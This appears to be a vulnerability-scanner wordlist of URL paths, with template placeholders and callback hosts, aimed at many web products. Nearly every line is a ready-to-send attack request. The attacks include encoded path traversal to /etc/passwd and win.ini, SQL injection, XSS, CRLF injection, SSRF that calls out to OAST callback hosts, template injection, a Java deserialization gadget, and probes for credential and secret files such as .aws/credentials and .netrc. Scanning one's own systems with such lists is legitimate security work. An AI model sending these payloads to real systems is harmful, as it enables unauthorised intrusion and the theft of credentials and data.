/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
/apply.cgi
/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=
/api/users/search_authors
/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;
/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php
/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout
/proxy?url=http://{{interactsh-url}}
/OA_HTML/ibeCAcpSSOReg.jsp
/OA_HTML/ibeCRgpPrimaryCreate.jsp
/OA_HTML/ibeCRgpIndividualUser.jsp
/OA_HTML/ibeCRgpPartnerPriCreate.jsp
/users/sign_in
/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)
/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}
/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command
/code?dag_id=example_passing_params_via_test_command
/lib/icinga/icinga-php-thirdparty/etc/passwd
/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd
/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd
/cors_proxy/https://oast.me/
/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd
/module/api.php?mobile/webNasIPS
/download/C%3a%2fwindows%2fsystem.ini
/wp/wp-content/uploads/wpjobboard/
/wp-content/uploads/wpjobboard/
/index.php?s=example
/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1
/wp-content/dup-installer/main.installer.php?is_daws=1
/config/list
/index/download/index?name=index.php&url=../../application/database.php
/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
/wp-content/plugins/simple-ajax-chat/sac-export.csv
/js/zimbraMail/share/model/ZmSettings.js
/category_view.php
/folder_view.php
/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg
/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green
/resources//../WEB-INF/web.xml
/test.txt
/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd
/live_mfg.shtml
/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5(
/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5(
/admin/requests/take_action.php?id=6
/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+
/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+
/cms/admin/group/all
/?doAs=`{{url_encode(
/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd
/api/moduleInformation
/git/notifyCommit?url={{randstr}}&branches={{randstr}}
/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd
/
/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22
/../../../../../../../../etc/passwd
/components/statestore
/overview
/controlplane
/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd
/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini
/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
/getCorsFile?urlPath={{base64(
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName(
/pentaho/Login
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js
/cgi-bin/ExportLogs.sh
/../../../../../../../../../../../../windows/iis.log
/wp-json/download-monitor/v1/user_data
/ExportReportingManager.aspx
/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}
/images//////////////////../../../../../../../../etc/passwd
/RP?wsrp-url=file:///etc/passwd
/RP?wsrp-url=file:///c:\\windows\\win.ini
/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd
/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>
/%255c%255c{{interactsh-url}}%255cC$%255cbb
/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime
/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime
/v1/avatars/favicon?url=http://{{interactsh-url}}
/_admin/imgdownload.php?filename=imgdownload.php
/tshirtecommerce/ajax.php?type=svg
/tshirtecommerce/fonts.php?name=2&type=./../index.php
/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini
//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd
/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd
/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php
/api/dns
/wp-json/igd/v1/get-users-data
/assets/built%2F..%2F..%2F/package.json
/assets/built%2F..%2F..%2F%E0%A4%A/package.json
/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd
/public/ticket/ajax/ajax.php?action=getContacts&email=%
/static/..%5c..%5c..%5c..%5cetc/passwd
/download/{{repeat(
/api/v1/slack/image/slack-image{{repeat(
/cgi-bin/exportCfgwithpasswd
/excel.php
/pos-kasir-php/excel.php
/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view
/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki
/.cpr/%2Fetc%2Fpasswd
/modules/
/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/DownloadWindow.php?filename=../../../../../../../../etc/passwd
/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash
/../../../../etc/passwd
/modules/simpleimportproduct/send.php?phpinfo=1
/modules/updateproducts/send.php?phpinfo=1
/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=
/api/sys/set_passwd
/opencms/cmisatom/cmis-online/query
/cmisatom/cmis-online/query
/lang/log/httpd.log
/api/2.0/preview/mlflow/experiments/list
/api/Image/withpath/C:\Windows\win.ini
/api/sys/login
/uploads/
/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+
/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+
/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css
/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css
/cgi-bin/MANGA/index.cgi
/wp-content/ldap-authentication-report.csv
/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=
/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=
/static/js/../../../../../../../../../../../../../../etc/passwd
/nodes?view=summary
/api/v0/logs/file?node_id={{nodeid}}&filename=../../../../../etc%2fpasswd&lines=50000
/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd
/wp-content/plugins/wp-fastest-cache/readme.txt
/wp-content/backups-dup-lite/tmp/
/wp-content/backups-dup-pro/tmp/
/wp-content/uploads/prime-mover-export-files/1/
/%2e%2e/%2e%2e/etc/passwd
/render/info.html
/res/login.jsf?javax.faces.ViewState={{generate_java_gadget(
/static/../../../../etc/passwd
/device/config
/Admin/Admin.aspx
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp
/interview?i=/etc/passwd
/position.js
/pictureproxy.php?url=file:///etc/passwd
/pictureproxy.php?url=http://{{interactsh-url}}
/wp-content/plugins/LayerSlider/assets/static/public/front.css
/currentsetting.htm
/API/V1/credentials
/login.rst
/webeditor/../../../windows/win.ini
/api/v1/confup?mode=&uid=1
/api/v1/confup?mode=lean&uid=1
/api/v1/ndconfig?mode=lean&uid=1
/api/v1/ndconfig?mode=&uid=1
/installed_emanual_list.html
/_next/image?w=16&q=10&url=http://{{interactsh-url}}
/_next/image?w=16&q=10&url=https://{{interactsh-url}}
/mailinspector/login.php
/mailinspector/public/loader.php?path=../../../../../../../etc/passwd
/apply/index.php?url=http://{{interactsh-url}}
/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)
/Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09
/%5C%5C{{interactsh-url}}/apachehttpd
/{{files}}
/{{http_1_files}}%3ftest.php
/html/usr/share/doc/hostname/copyright%3f
/static/link/%2e%2e/etc/passwd
/login
/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd
/-/media/doo-doo.ashx
/config.php
/config/config.php
/include/config.php
/includes/config.php
/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/ui/login/register
/_profiler/phpinfo?+--env=dev
/rest/rights/
/nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d
/nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d
/nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d
/nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d
/info/dir?/
/adama/adama/downloadService?type=1&file=../../../../etc/passwd
/?gf_page=randomstring
/api/setup-complete
/wp-content/plugins/uix-shortcodes/readme.txt
/index.php?mod=textviewer&src=file:///etc/passwd
/trufusionPortal/jsp/internal_admin_contact_login.jsp
/unified-console.html
/controlloLogin.js
/{{path}}
/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd
/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id
/contact/
/contact-us/
/submit/
/support/
/form/
/get-in-touch/
/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt
/auth/failure?provider={{redirect_payload}}
/auth/failure?provider={{basic_xss}}
/{{js_file_url}}
{{path}}
/xwiki/webjars/wiki%3Axwiki/..%2F..%2F..%2F..%2F..%2FWEB-INF%2Fxwiki.cfg
/bin/ssx/Main/WebHome?resource=../../WEB-INF/xwiki.cfg&minify=false
/webapps/xwiki/WEB-INF/xwiki.properties
/_image?href=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg
/console/auth/login
/system/console/bundles
///system///console///bundles
/api/auth/login
/CDGServer3/SystemConfig
/data/login
/psc/ps/?&cmd=login&languageCd=ENG
/psp/csperf/?&cmd=login&languageCd=ENG
/psp/FMPRD/?&cmd=login&languageCd=ENG
/psp/csprd/?&cmd=login&languageCd=ENG
/psp/hcmprdfp/?&cmd=login&languageCd=ENG
/psp/HRPRODASP/?&cmd=login&languageCd=ENG
/psp/guest/?&cmd=login&languageCd=ENG
/psp/CSPRD_PUB/?&cmd=login&languageCd=ENG
/psp/LHCGWPRD_1/?&cmd=login&languageCd=ENG
/psp/CCHIPRD_2/?&cmd=login&languageCd=ENG
/psp/applyuth/?&cmd=login&languageCd=ENG
/psp/HRPRD/?&cmd=login&languageCd=ENG
/psp/CAREERS/?&cmd=login&languageCd=ENG
/psp/heprod_5/?&cmd=login&languageCd=ENG
/psp/saprod/?&cmd=login&languageCd=ENG
/psp/hr857prd_er/?&cmd=login&languageCd=ENG
/psp/CHUMPRDM/?&cmd=login&languageCd=ENG
/psp/HR92PRD/?&cmd=login&languageCd=ENG
/psp/cangate_1/?&cmd=login&languageCd=ENG
/psp/ihprd/?&cmd=login&languageCd=ENG
/app/login
/invoke/pub.file/getFile
/.aws/credentials
{{paths}}
/collibra.properties
/app/collibra.properties
/src/collibra.properties
/config.properties
/config.properties.bak
/ui_config.properties
/mailsms/s?func=ADMIN:appState&dumpConfig=/
/.dockercfg
/.docker/config.json
/.esmtprc
/admin/setup
/ftpsync.settings
/webapi/v1/system/accountmanage/account
/app/etc/local.xml
/app/etc/local.xml.additional
/store/app/etc/local.xml
/.msmtprc
/.netrc
/_netrc
/OA_HTML/jtfwrepo.xml
/parameters.yml
/app/config/parameters.yml
/parameters.yml.dist
/app/config/parameters.yml.dist
/anything_here
/core/config/databases.yml
/config/database.yml
/db/robomongo.json
/robomongo.json
/login.php
/.s3cfg
/sftp-config.json
/deployment-config.json
/config/development.sphinx.conf
/config/production.sphinx.conf
/configs/sphinx.conf
/search/configs/sphinx.conf
/sphinx.conf
/sphinx/sphinx.conf
/sphinxsearch/sphinx.conf
/config/databases.yml
/_profiler/empty/search/results?limit=10
/app_dev.php/_profiler/empty/search/results?limit=10
/index.php/_profiler/empty/search/results?limit=10
/index_dev.php/_profiler/empty/search/results?limit=10
/dev.php/_profiler/empty/search/results?limit=10
/debug.php/_profiler/empty/search/results?limit=10
/_debug/_profiler/empty/search/results?limit=10
/web/_profiler/empty/search/results?limit=10
/public/_profiler/empty/search/results?limit=10
/frontend_dev.php/_profiler/empty/search/results?limit=10
/backend_dev.php/_profiler/empty/search/results?limit=10
/api_dev.php/_profiler/empty/search/results?limit=10
/app.php/_profiler/empty/search/results?limit=10
/app_test.php/_profiler/empty/search/results?limit=10
/test.php/_profiler/empty/search/results?limit=10
/symfony/_profiler/empty/search/results?limit=10
/debug/_profiler/empty/search/results?limit=10
/dev/_profiler/empty/search/results?limit=10
/profiler/empty/search/results?limit=10
/ventrilo_srv.ini
/ws-config.json
/ws-config.example.json
/wp-config.php-backup
/%c0
/appsettings.json
/appsettings.Production.json
/.remote-sync.json
/auth.json
/.auth.json
/config/auth.json
/configs/auth.json
/configuration/auth.json
/api/auth.json
/app/auth.json
/assets/auth.json
/data/auth.json
/files/auth.json
/public/auth.json
/static/auth.json
/uploads/auth.json
/backup/auth.json
/backups/auth.json
/tmp/auth.json
/temp/auth.json
/cache/auth.json
/logs/auth.json
/admin/auth.json
/administrator/auth.json
/src/auth.json
/source/auth.json
/www/auth.json
/web/auth.json
/site/auth.json
/sites/auth.json
/private/auth.json
/secure/auth.json
/secret/auth.json
/secrets/auth.json
/env/auth.json
/environment/auth.json
/test/auth.json
/tests/auth.json
/dev/auth.json
/development/auth.json
/staging/auth.json
/prod/auth.json
/production/auth.json
/includes/auth.json
/include/auth.json
/lib/auth.json
/libs/auth.json
/library/auth.json
/vendor/auth.json
/vendors/auth.json
/node_modules/auth.json
/storage/auth.json
/database/auth.json
/db/auth.json
/auth/auth.json
/authentication/auth.json
/oauth/auth.json
/keys/auth.json
/credentials/auth.json
/creds/auth.json
/manage.py
/settings.py
/app/settings.py
/django/settings.py
/settings/settings.py
/web/settings/settings.py
/{{app_name}}/settings.py
/.ftpconfig
/user_secrets.yml
/user_secrets.yml.old
/configuration.yml
/config/configuration.yml
/redmine/config/configuration.yml
/js/salesforce.js
/salesforce.js
/secrets.yml
/config/secrets.yml
/test/config/secrets.yml
/redmine/config/secrets.yml
/backup/config.xml
/.travis.yml
/matomo/.travis.yml
/ckeditor/.travis.yml
/sftp.json
/.config/sftp.json
/.vscode/sftp.json
/__clockwork/app
/admin/login/?next=/admin/
/elmah
/elmah.axd
/storage/logs/laravel.log
/lang/log/system.log
/?q=../../../etc/passwd&s=../../../etc/passwd&search=../../../etc/passwd&id=&action=../../../etc/passwd&keyword=../../../etc/passwd&query=../../../etc/passwd&page=../../../etc/passwd&keywords=../../../etc/passwd&url=../../../etc/passwd&view=../../../etc/passwd&cat=../../../etc/passwd&name=../../../etc/passwd&key=../../../etc/passwd&p=../../../etc/passwd
/?q=../../../etc/passwd%00&s=../../../etc/passwd%00&search=../../../etc/passwd%00&id=../../../etc/passwd%00&action=../../../etc/passwd%00&keyword=../../../etc/passwd%00&query=../../../etc/passwd%00&page=../../../etc/passwd%00&keywords=../../../etc/passwd%00&url=../../../etc/passwd%00&view=../../../etc/passwd%00&cat=../../../etc/passwd%00&name=../../../etc/passwd%00&key=../../../etc/passwd%00&p=../../../etc/passwd%00
/?q=%252e%252e%252fetc%252fpasswd&s=%252e%252e%252fetc%252fpasswd&search=%252e%252e%252fetc%252fpasswd&id=%252e%252e%252fetc%252fpasswd&action=%252e%252e%252fetc%252fpasswd&keyword=%252e%252e%252fetc%252fpasswd&query=%252e%252e%252fetc%252fpasswd&page=%252e%252e%252fetc%252fpasswd&keywords=%252e%252e%252fetc%252fpasswd&url=%252e%252e%252fetc%252fpasswd&view=%252e%252e%252fetc%252fpasswd&cat=%252e%252e%252fetc%252fpasswd&name=%252e%252e%252fetc%252fpasswd&key=%252e%252e%252fetc%252fpasswd&p=%252e%252e%252fetc%252fpasswd
/?q=%252e%252e%252fetc%252fpasswd%00&s=%252e%252e%252fetc%252fpasswd%00&search=%252e%252e%252fetc%252fpasswd%00&id=%252e%252e%252fetc%252fpasswd%00&action=%252e%252e%252fetc%252fpasswd%00&keyword=%252e%252e%252fetc%252fpasswd%00&query=%252e%252e%252fetc%252fpasswd%00&page=%252e%252e%252fetc%252fpasswd%00&keywords=%252e%252e%252fetc%252fpasswd%00&url=%252e%252e%252fetc%252fpasswd%00&view=%252e%252e%252fetc%252fpasswd%00&cat=%252e%252e%252fetc%252fpasswd%00&name=%252e%252e%252fetc%252fpasswd%00&key=%252e%252e%252fetc%252fpasswd%00&p=%252e%252e%252fetc%252fpasswd%00
/?q=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&s=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&search=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&id=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&action=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keyword=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&query=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keywords=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&url=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&view=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&cat=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&name=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&key=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&p=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/?q=....//....//etc/passwd&s=....//....//etc/passwd&search=....//....//etc/passwd&id=....//....//etc/passwd&action=....//....//etc/passwd&keyword=....//....//etc/passwd&query=....//....//etc/passwd&page=....//....//etc/passwd&keywords=....//....//etc/passwd&url=....//....//etc/passwd&view=....//....//etc/passwd&cat=....//....//etc/passwd&name=....//....//etc/passwd&key=....//....//etc/passwd&p=....//....//etc/passwd
/?q=..///////..////..//////etc/passwd&s=..///////..////..//////etc/passwd&search=..///////..////..//////etc/passwd&id=..///////..////..//////etc/passwd&action=..///////..////..//////etc/passwd&keyword=..///////..////..//////etc/passwd&query=..///////..////..//////etc/passwd&page=..///////..////..//////etc/passwd&keywords=..///////..////..//////etc/passwd&url=..///////..////..//////etc/passwd&view=..///////..////..//////etc/passwd&cat=..///////..////..//////etc/passwd&name=..///////..////..//////etc/passwd&key=..///////..////..//////etc/passwd&p=..///////..////..//////etc/passwd
/?q=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&s=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&search=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&id=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&action=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keyword=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&query=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keywords=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&url=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&view=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&cat=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&name=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&key=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&p=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
/?q=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&s=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&search=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&id=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&action=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keyword=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&query=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keywords=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&url=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&view=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&cat=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&name=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&key=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&p=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/?q=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/image?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/file?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/file?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/image?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/image?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/file?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/file?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/?q=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini
/..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini
/..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/../../../../../../windows/win.ini
/cgi-bin/dynamic/config/secure/security.html
/cgi-bin/privatekey.pem
/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/crx/explorer/nodetypes/index.jsp
//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a
/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a
/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html
/admin/
/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E
/_config
/nifi-api/access/config
/api/security/ticket
/artifactory/ui/repodata?deploy=true
/api/get-users?p=123&pageSize=123
/?query=SHOW%20DATABASES
/__clockwork/latest
/cgi-bin/webproc
/?SPX_KEY={{api_key}}&SPX_UI_URI=/
/client/index.html
/druid/index.html
/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties
/v2/auth/roles
/request_para.cgi?parameter=wifi_get_5g_host
/i/?a=logs
/admin/setup-wizard
/user/sign_up
/go/add-on/business-continuity/api/cruise_config
/admin
/artemis/env
/artemis-portal/artemis/env
/artemis/actuator/env
/artemis;/env;
/artemis/1/..;/env
/SSI/Auth/ip_snmp.htm
/hp/device/webAccess/index.htm?content=security
/install.html
/installation/index.php
/setup/start
/install.php
/install/index.php
/installer
/?page=step_1
/index.php/install
/auth/setup
/main/install/index.php
/setup
/cb_install/
/setup/wizard.php
/itop/setup/wizard.php
/setup/setupcluster-start.action
/SetupWizard.aspx
/install
/wizard/wizard.cs
/finish-installation/register
/register
/install.php?profile=default
/core/install.php
/install/install.php
/web/index.html?start=wizard#!/wizard/wizardstart.html
/organization-setup
/i/?rid
/install/?step=1
/installer/install.php
/#/install/main
/settings
/wizard/database/
/configure
/secure/SetupMode!default.jspa
/common/setup.php
/setup/wizard/
/install/checks
/index.php?r=installer/welcome
/admin/login?next=%2Fadmin
/index.php/install/
/admin/install.php
/setup/
/nagioslogserver/install
/nagiosxi/install.php
/index/install
/index.php/index/install
/Wizard.aspx
/setup.php
/setup/index.jsp
/installer/installerUI.php
/owncloud/
/Setup/index.php/
